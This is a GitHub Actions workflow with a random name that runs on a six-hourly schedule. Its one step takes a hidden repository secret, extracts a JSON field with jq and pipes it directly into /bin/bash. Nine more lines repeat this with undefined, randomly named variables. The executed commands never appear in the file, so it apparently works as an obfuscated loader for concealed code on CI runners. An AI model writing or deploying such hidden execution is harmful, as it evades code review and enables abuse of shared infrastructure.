name: luotianbo1234
on:
  workflow_dispatch:
  schedule:
    - cron: '40 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: luotianbo1234
        env:
          j700: ${{ secrets.j700 }}
        run: |
          echo $j700 | jq -r .lf2808 | /bin/bash
          echo $ht38924 | jq -r .o5712 | /bin/bash
          echo $rd5 | jq -r .zey40 | /bin/bash
          echo $cws917 | jq -r .wobo402 | /bin/bash
          echo $stgnb7 | jq -r .hym11 | /bin/bash
          echo $iykr5 | jq -r .e1331 | /bin/bash
          echo $y9 | jq -r .h4 | /bin/bash
          echo $zn765 | jq -r .cr972 | /bin/bash
          echo $qyu5 | jq -r .lvz50 | /bin/bash
          echo $mgoz03 | jq -r .vagf77860 | /bin/bash

